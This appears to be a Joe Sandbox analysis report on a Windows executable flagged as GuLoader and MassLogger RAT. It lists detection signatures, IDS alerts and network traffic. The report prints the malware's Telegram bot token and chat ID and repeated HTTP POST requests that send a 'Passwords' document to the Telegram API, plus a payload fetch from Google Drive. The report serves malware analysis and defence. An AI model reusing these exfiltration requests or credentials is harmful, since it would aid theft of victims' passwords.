Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c7WJL1gt32.exe

Overview

General Information

Sample name:c7WJL1gt32.exe
renamed because original name is a hash value
Original sample name:08972ea67ce0756e8af06aeea9628d2ec00392351f8aaaf69cde005f79d74051.exe
Analysis ID:1588956
MD5:7549ee46b6e4391bb5d33788fb901e8d
SHA1:d37b7af1fd0bbb25904818f93b4f992af8631fdd
SHA256:08972ea67ce0756e8af06aeea9628d2ec00392351f8aaaf69cde005f79d74051
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • c7WJL1gt32.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\c7WJL1gt32.exe" MD5: 7549EE46B6E4391BB5D33788FB901E8D)
    • c7WJL1gt32.exe (PID: 7856 cmdline: "C:\Users\user\Desktop\c7WJL1gt32.exe" MD5: 7549EE46B6E4391BB5D33788FB901E8D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2418431968.00000000050B4000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: c7WJL1gt32.exe PID: 7856JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:39:55.628697+010020577441Malware Command and Control Activity Detected192.168.2.449968149.154.167.220443TCP
            2025-01-11T07:39:57.862466+010020577441Malware Command and Control Activity Detected192.168.2.449983149.154.167.220443TCP
            2025-01-11T07:39:59.799694+010020577441Malware Command and Control Activity Detected192.168.2.449999149.154.167.220443TCP
            2025-01-11T07:40:05.839276+010020577441Malware Command and Control Activity Detected192.168.2.450014149.154.167.220443TCP
            2025-01-11T07:40:11.469514+010020577441Malware Command and Control Activity Detected192.168.2.450016149.154.167.220443TCP
            2025-01-11T07:40:17.817338+010020577441Malware Command and Control Activity Detected192.168.2.450018149.154.167.220443TCP
            2025-01-11T07:40:28.478131+010020577441Malware Command and Control Activity Detected192.168.2.450021149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:39:47.899216+010028032742Potentially Bad Traffic192.168.2.449921132.226.8.16980TCP
            2025-01-11T07:39:54.664778+010028032742Potentially Bad Traffic192.168.2.449921132.226.8.16980TCP
            2025-01-11T07:39:56.992895+010028032742Potentially Bad Traffic192.168.2.449977132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:39:42.346458+010028032702Potentially Bad Traffic192.168.2.449890216.58.206.46443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:39:55.319636+010018100081Potentially Bad Traffic192.168.2.449968149.154.167.220443TCP
            2025-01-11T07:39:57.585132+010018100081Potentially Bad Traffic192.168.2.449983149.154.167.220443TCP
            2025-01-11T07:39:59.520971+010018100081Potentially Bad Traffic192.168.2.449999149.154.167.220443TCP
            2025-01-11T07:40:05.590667+010018100081Potentially Bad Traffic192.168.2.450014149.154.167.220443TCP
            2025-01-11T07:40:11.213482+010018100081Potentially Bad Traffic192.168.2.450016149.154.167.220443TCP
            2025-01-11T07:40:17.385598+010018100081Potentially Bad Traffic192.168.2.450018149.154.167.220443TCP
            2025-01-11T07:40:27.919829+010018100081Potentially Bad Traffic192.168.2.450021149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: c7WJL1gt32.exeAvira: detected
            Source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: c7WJL1gt32.exe.7856.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: c7WJL1gt32.exeVirustotal: Detection: 77%Perma Link
            Source: c7WJL1gt32.exeReversingLabs: Detection: 73%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6D1EC CryptUnprotectData,4_2_37B6D1EC
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6D9D9 CryptUnprotectData,4_2_37B6D9D9
            Source: c7WJL1gt32.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49932 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49890 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49896 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49968 version: TLS 1.2
            Source: c7WJL1gt32.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_0040672B FindFirstFileW,FindClose,4_2_0040672B
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_00405AFA
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6C985h4_2_37B6C638
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B61042h4_2_37B60C28
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B60671h4_2_37B603AF
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6EA48h4_2_37B6E790
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B61042h4_2_37B60F6F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6E198h4_2_37B6DEE1
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6C041h4_2_37B6BD88
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6B791h4_2_37B6B4D8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B61042h4_2_37B60C1A
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6EEA0h4_2_37B6EBE8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6E5F0h4_2_37B6E339
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6DD40h4_2_37B6DA89
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6C499h4_2_37B6C1E0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6BBE9h4_2_37B6B930
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6B339h4_2_37B6B07F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 37B6F2F8h4_2_37B6F044
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then push 00000000h4_2_3831BDF0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 3831882Dh4_2_38318650
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 383191B7h4_2_38318650
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38314ACAh4_2_38314820
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38317318h4_2_38317070
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38311B00h4_2_38311858
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 383123B0h4_2_38312108
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38312C60h4_2_383129B8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 383154B0h4_2_38315208
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38313510h4_2_38313268
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38315D60h4_2_38315AB8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38313DC0h4_2_38313B18
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38316610h4_2_38316368
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38317B4F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38314670h4_2_383143C8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38316EC0h4_2_38316C18
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 383116A8h4_2_38311400
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38311F58h4_2_38311CB0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38317770h4_2_383174C8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38312808h4_2_38312560
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38315058h4_2_38314DB0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 383130B8h4_2_38312E10
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38315908h4_2_38315660
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38313968h4_2_383136C0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 383161B8h4_2_38315F10
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38314218h4_2_38313F70
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38311250h4_2_38310FA8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then jmp 38316A68h4_2_383167C0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4x nop then push 00000000h4_2_3833E790

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50021 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50021 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49968 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49968 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49999 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49999 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50014 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e0d8e507c4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f9f36ff63cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3211933dfd44Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3257f8ac7e6aHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3296d7c0aa3cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32dd306f6d66Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33301687c692Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49921 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49977 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49890 -> 216.58.206.46:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49932 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e0d8e507c4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C8A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C24000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C8A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C24000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C8A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C24000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: c7WJL1gt32.exe, 00000004.00000002.2980225295.0000000038282000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: c7WJL1gt32.exe, 00000004.00000002.2980225295.0000000038282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/)
            Source: c7WJL1gt32.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
